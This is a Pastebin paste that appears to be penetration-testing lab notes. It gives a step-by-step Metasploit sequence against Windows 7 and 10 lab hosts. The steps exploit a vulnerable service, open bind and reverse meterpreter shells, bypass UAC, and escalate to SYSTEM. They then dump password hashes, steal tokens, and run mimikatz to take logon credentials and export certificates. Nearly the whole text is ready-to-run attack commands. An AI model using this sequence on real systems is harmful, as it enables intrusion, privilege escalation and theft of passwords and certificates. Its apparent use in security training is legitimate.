API tools faq
paste
Advertisement
joemccray

1

joemccray
Sep 18th, 2019
574
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.17 KB | None | 0 0
raw download clone embed print report
  1. Windows 10
  2. ----------
  3. use exploit/windows/misc/vulnserv
  4. set PAYLOAD windows/meterpreter/bind_tcp
  5. set RHOST 192.168.195.143
  6. set RPORT 9999
  7. exploit
  8.  
  9.  
  10.  
  11. Windows 7
  12. ---------
  13. use exploit/windows/misc/vulnserv
  14. set PAYLOAD windows/meterpreter/bind_tcp
  15. set RHOST 192.168.195.141
  16. set RPORT 9999
  17. exploit
  18. background
  19.  
  20.  
  21.  
  22. use exploit/windows/local/ask
  23. set SESSION 8
  24. set PAYLOAD windows/meterpreter/reverse_tcp
  25. set LHOST 192.168.195.143
  26. set LPORT 7799
  27. exploit
  28.  
  29.  
  30.  
  31. -----------------------------------------------------------------------
  32.  
  33.  
  34. A window will pop up and you need to click Yes in order to get your new meterpreter shell
  35.  
  36.  
  37. meterpreter > getuid
  38.  
  39. meterpreter > ps (search for a process running as NT AUTHORITY\SYSTEM)
  40.  
  41. meterpreter > migrate 2800 (your process id WILL NOT be 2800, but make sure you use one that is running at NT AUTHORITY\SYSTEM)
  42.  
  43. meterpreter > getsystem
  44. ...got system (via technique 1).
  45.  
  46.  
  47. meterpreter > getuid
  48. Server username: NT AUTHORITY\SYSTEM
  49.  
  50.  
  51. meterpreter> run post/windows/gather/hashdump
  52.  
  53. meterpreter> run post/windows/gather/credentials/credential_collector
  54. -----------------------------------------------------------------------
  55.  
  56.  
  57. ********************************** Steal Tokens **********************************
  58.  
  59. ---------------------------Type This-----------------------------------
  60. meterpreter > getsystem
  61.  
  62. meterpreter > use incognito
  63.  
  64. meterpreter > list_tokens -u
  65.  
  66. meterpreter > list_tokens -g
  67.  
  68. meterpreter > impersonate_token <-- choose who you want to impersonate but be sure to use 2 slashes in the name (ex: impersonate_token domain\\user)
  69.  
  70. meterpreter> getuid
  71. -----------------------------------------------------------------------
  72.  
  73.  
  74. ************ Stealing credentials and certificates ************
  75. - NOTE: Most of the stuff after 'kerberos' DOES NOT work, but is given here so you know the correct syntax to use when connected to AD or dealing with smart/CAC cards.
  76.  
  77. ---------------------------Type This-----------------------------------
  78. meterpreter > getsystem
  79.  
  80. meterpreter > load mimikatz
  81.  
  82. meterpreter > kerberos
  83.  
  84. meterpreter > mimikatz_command -f sekurlsa::logonPasswords -a "full"
  85.  
  86. meterpreter > msv <-- Your AD password
  87.  
  88. meterpreter > livessp <-- Your Windows8 password
  89.  
  90. meterpreter > ssp <-- Your outlook password
  91.  
  92. meterpreter > tspkg <-- Your AD password
  93.  
  94. meterpreter > wdigest <-- Your AD password
  95.  
  96. meterpreter > mimikatz_command -f crypto::listStores
  97.  
  98. meterpreter > mimikatz_command -f crypto::listCertificates
  99.  
  100. meterpreter > mimikatz_command -f crypto::exportCertificates CERT_SYSTEM_STORE_CURRENT_USER
  101.  
  102. meterpreter > mimikatz_command -f crypto::patchcapi
  103.  
  104. meterpreter> search -d <directory> -f <file-pattern>
  105. -----------------------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!